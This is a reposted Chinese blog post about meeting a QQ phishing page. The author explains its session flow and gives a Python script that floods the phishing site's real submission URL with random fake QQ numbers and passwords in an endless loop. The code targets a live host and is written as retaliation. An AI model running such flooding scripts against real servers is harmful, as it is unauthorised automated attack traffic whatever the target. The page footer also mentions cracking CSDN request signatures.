- 浏览: 15843 次
最新评论
(转自CSDN Dinosoft's Blog)给钓鱼网站骗子一点颜色看看---一个简单的攻击程序
2012年01月01日
群里有人发了一个骗子的链接,不知是被盗号还是怎么。
http://tuisend.china.com//cc/00AOLhttp://p.tl/4P9G
链接在中华网域名下,跟“中国领事馆”的主题配合得很好,能骗到不少2B青年了。
这个tuisend.china.com到底是啥?反正功能是可以提供url转向。猜想是个用来统计的接口什么的吧。“tuisend”?“推送”?
这种东西一看就知道是骗人的,很好奇骗子是要干什么(广告?盗号?木马?。。),于是点进去看看。
点进去一跳转,地址就露馅了。假页面用iframe嵌入了一个真实的QQ空间,节省带宽,真实度又100%。不过css没调好,页面有白边。弹出一个输入Qzone密码的对话框。我刚开始就被骗了,以为是真的QQ空间,也没去注意看域名什么的。不过输完密码一下子就恍然大悟,赶紧去修改了QQ密码,还好没被盗号。
反正最近密码泄漏得很厉害,也该改改密码了。
太让我生气了!所以决定教训一下这些混蛋,灌一堆假密码进去!
python代码:
view plain
# -*- coding: UTF-8 -*- import urllib, urllib2, cookielib import random, string myCookie = urllib2.HTTPCookieProcessor(cookielib.CookieJar()) openner = urllib2.build_opener(myCookie) while True: QQNumber='%d'%random.randrange(12345678,999999999); passlen = random.randrange(8,14) QQPassWord= string.join( random.sample('dadofiahdnwj12746t32dadhknczoqwe',passlen)).replace(" ", ""); yzm=string.join( random.sample('ZLJOIFENFECWOIEYSWEMEL', 5)).replace(" ", "") print "fake QQ",QQNumber print "fake Password",QQPassWord website="http://bgfd7.fvx.8866.org:80" path="/16/index2.asp" params=urllib.urlencode({"QQNumber":QQNumber, "QQPassWord":QQPassWord}) r = urllib2.Request( website+path, params ) data = openner.open(r).read() print data r = urllib2.Request( website+path, params ) data = openner.open(r).read() print data
就是用firefox抓取到提交地址,直接模拟提交而已。用到随机数据的生成和urllib2。
不过说起来简单,实现的时候有大问题。
骗子的网站基本流程是这样的:
前端很简陋,没输入密码也能提交,不过提交后如果没填密码会提示不正确。
第一次提交后,猜想骗子把帐号记录到session,然后骗你帐号错,再输入一遍!如果qq号之前已经输入过,则自动跳转到qq空间。
为了确认自己攻击成功,需要打印出服务器响应的内容,成功的话,是会显示一个form表单,然后用js提交实现页面跳转。失败的话,会输出alert提示。
所以,攻击程序需要加上cookie支持,而且攻击要提交两次才行!刚开始没弄清楚,还害我调试很久!
验证码可以不用发送,骗子根本不关心,程序也没验证
开始时不成功,今天想起来还是觉得耿耿于怀,手痒再整了一把,终于被我搞定。

发表评论
-
Android应用程序开发环境搭建(WINDOWS)
2012-01-20 00:24 791Android应用程序开发环境 ... -
Windows消息机制VC
2012-01-20 00:24 623Windows消息机制VC 2011年0 ... -
Windows Azure Content Delivery Network的最佳实践
2012-01-20 00:24 622Windows Azure Content Delivery ... -
Windows加载器与模块初始化
2012-01-20 00:23 1111Windows加载器与模块初始 ... -
基础要打好: 如何正确地进入基于x86-64Bit Windows系统的商业软件破解领域
2012-01-20 00:23 726基础要打好: 如何正确 ... -
培养阳光心态,培养积极性 的演讲稿
2012-01-19 01:20 532培养阳光心态,培养积极 ... -
我的元旦演讲稿
2012-01-19 01:20 495我的元旦演讲稿 2012年01月11日 尊敬各位的领导、 ... -
演讲稿
2012-01-19 01:20 680演讲稿 2011年12月21日 各位老师各位同学们,大家 ... -
演讲稿
2012-01-19 01:20 610演讲稿 2011年05月07日 竞职演讲稿 各位领导 ... -
演讲稿《相信自己》
2012-01-19 01:20 2461演讲稿《相信自己》 2012年01月12日 大家好,我非 ... -
多线程
2012-01-17 00:37 629多线程 2010年06月06日 ... -
Microsoft Windows CE系统介绍
2012-01-17 00:36 1024Microsoft Windows CE系统介 ... -
多线程
2012-01-17 00:36 592多线程 2011年05月15日 ... -
编程,乐趣何在?
2012-01-17 00:36 588编程,乐趣何在? 2011年12月20日 转载自:htt ... -
Black Duck - Guan Yin Bodhisattva in Mind (2006)
2012-01-15 14:59 640Black Duck - Guan Yin Bodhisatt ... -
大范围雨雪天气10日起侵袭南方 或对春运不利
2012-01-15 14:59 697大范围雨雪天气10日起 ... -
广州8所机关幼儿园获补7524万 比去年增1770万
2012-01-15 14:59 643广州8所机关幼儿园获补7524万 比去年增1770万 201 ... -
什么啊.0.000
2012-01-15 14:59 651什么啊.0.000 2011年03月20日 ... -
无法使用千千静听的日子,太不爽了……哪个TMD的在千千网页里放了木马
2012-01-15 14:59 659无法使用千千静听的日子,太不爽了……哪个TMD的在千千网页里放 ...
相关推荐
在本文中,我们将深入探讨与"三种颜色传感器资料-带测试成功程序-csdn.rar"相关的IT知识,主要关注GY-33、HW-67和TCS230这三种颜色传感器,以及它们在Arduino平台上的应用和与ws2812灯带的互动。 1. **GY-33颜色...
CSDN博客作为一个知名的开发者社区,为了保护用户信息和防止恶意攻击,采用了安全认证机制。本文将深入探讨CSDN博客安全认证头中的两个关键元素:`x-ca-nonce` 和 `x-ca-signature`,并展示如何使用Java代码来生成这...
这个压缩包文件"csdn的x-ca-nonce和x-ca-signature算法破解实例.rar"包含了一个关于如何理解和处理CSDN API中的"x-ca-nonce"和"x-ca-signature"算法的实例。 "x-ca-nonce"和"x-ca-signature"是两种常见的安全策略...
IOS开发常用工具网站地址 - 一个程序猿的故事 - 博客频道 - CSDN.NET1
Java--利用TCP编写一个简单的聊天工具(csdn)————程序
这是一个微信小程序转抖音小程序的jar软件,支持微信与抖音小程序互转,使用命令行操作。支持以下命令: -i --要转换的工程路径 -o --转换后的工程路径 -ctype --转换类型, w2d或d2w w2d表示微信转抖音 d2w...
在每次请求接口的时候都会在...简单的分析不难得出x-ca-key和x-ca-signature-headers是两固定值,x-ca-nonce是个随机串,核心就是x-ca-signature的计算,本地基于Java实现,有实测代码,有js分析,也有总结,希望能够帮到大家
EtherCAT主站SOEM -- 19 --Qt-Soem通过CSV模式控制一个电机转圈圈这一篇博客的源代码, 博客链接:( https://blog.csdn.net/qq_50808730/category_12482257.html ) 视频链接: ( ...
在IT行业中,个人博客是技术分享、学习交流的重要平台,而一个美观、易读的博客模板能极大地提升用户体验。本文将深入探讨CSDN博客模板中的Wiisoft样式,以及如何利用这个模板来打造个性化的博客空间。 Wiisoft模板...
微信小程序通过BLE低功耗蓝牙向USB HID键盘设备输出汉字(内含GBK编码转汉字)_小程序 gbk-CSDN博客.mhtml
名称:CSDN·浏览器助手 ---------------------------------------- 版本:3.0.5 作者:https://plugin.csdn.net 分类:开发者工具 ---------------------------------------- 概述:一款集成本地书签、历史记录与 ...
在这个主题中,我们将探讨如何使用Python编写一个简单的爬虫程序来抓取CSDN博客的文章内容。CSDN(Chinese Software Developer Network)是中国的一个大型程序员社区,其中包含大量的技术博客,是获取编程知识的重要...
【标题】"CSDN-中文IT社区-600万.rar" 提示我们这是一个与CSDN(China Software Developer Network)相关的压缩文件,其中包含了600万个资源。CSDN是中国最大的IT技术交流平台,它涵盖了各种编程语言、软件开发、...
USB转485驱动程序是将USB接口转换为RS-485通信协议的一种软件工具,主要用于连接和支持485总线设备的通信。在Windows 10 64位操作系统环境下,这样的驱动程序至关重要,因为许多工业设备、自动化设备或远程监控系统...
CSDN-Blog-Client, 小巫CSDN博客客户端,CSDN人气博主——小巫的倾情之作。
开发环境 eclipse for jee+jdk7+tomcat7 lucene4.4+crawler4j3.5 索引文件位置:/csdn-blog-crawler/data 记得把生成的索引放入:/csdn-blog-crawler/WebContent
用HP-Socket写一个简单好看的网页聊天室
这是一个抽奖转转盘游戏-使用微信小程序开发工具编写而成,用Canvas组件绘制的, 可用(手机)微信扫码打开运行测试体验,小程序源代码完整,供学习参考, 配套的教程请看相关文章...
硬件环境:基于Ubuntu18.04系统上使用QT搭建SOEM主站。 ...并且对1个EtherCAT从站 电机进行操作,通过CSV模式(周期同步速度模式)控制一个电机转圈圈,正转,反转及停止,及电机运行过程中停止。
硬件环境: windows10及windows11系统利用QT平台搭建EtherCAT主站(SOEM)。...并且对1个EtherCAT从站 电机进行操作,通过周期同步力矩模式(CST模式)控制一个电机转圈圈,正转,反转及停止,及电机运行过程中停止。